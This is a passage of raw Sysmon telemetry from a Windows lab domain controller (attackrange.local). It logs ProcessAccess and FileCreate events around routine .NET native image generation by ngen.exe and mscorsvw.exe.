13:25:26.414{08A6967A-4646-6000-A603-000000009A01}5060C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\13c4-0\Microsoft.Build.Framework.dll2021-01-14 13:25:26.414 10341000x80000000000000007868Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:26.164{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4646-6000-A603-000000009A01}5060C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007867Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:26.149{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4646-6000-A603-000000009A01}5060C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007866Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:26.149{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4646-6000-A603-000000009A01}5060C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007865Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:26.102{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4646-6000-A503-000000009A01}2828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007864Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:26.086{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4646-6000-A503-000000009A01}2828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007863Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:26.086{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4646-6000-A503-000000009A01}2828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007883Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:28.961{08A6967A-4648-6000-AA03-000000009A01}3304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\ce8-0\Microsoft.Build.Utilities.v4.0.dll2021-01-14 13:25:28.961 10341000x80000000000000007882Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:28.571{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4648-6000-AA03-000000009A01}3304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007881Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:28.555{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4648-6000-AA03-000000009A01}3304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007880Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:28.555{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4648-6000-AA03-000000009A01}3304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007879Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:28.493{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4648-6000-A903-000000009A01}3436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007878Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:28.477{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4648-6000-A903-000000009A01}3436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007877Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:28.477{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4648-6000-A903-000000009A01}3436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007876Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:28.336{08A6967A-4646-6000-A803-000000009A01}4208C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1070-0\Microsoft.Build.Tasks.v4.0.dll2021-01-14 13:25:28.336 10341000x80000000000000007901Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:29.758{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4649-6000-B003-000000009A01}2316C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007900Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:29.743{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4649-6000-B003-000000009A01}2316C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007899Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:29.743{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4649-6000-B003-000000009A01}2316C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007898Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:29.618{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4649-6000-AF03-000000009A01}816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007897Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:29.602{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4649-6000-AF03-000000009A01}816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007896Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:29.602{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4649-6000-AF03-000000009A01}816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007895Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:29.571{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4649-6000-AE03-000000009A01}3404C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007894Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:29.555{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4649-6000-AE03-000000009A01}3404C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007893Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:29.555{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4649-6000-AE03-000000009A01}3404C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007892Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:29.196{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4649-6000-AD03-000000009A01}2992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007891Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:29.180{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4649-6000-AD03-000000009A01}2992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007890Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 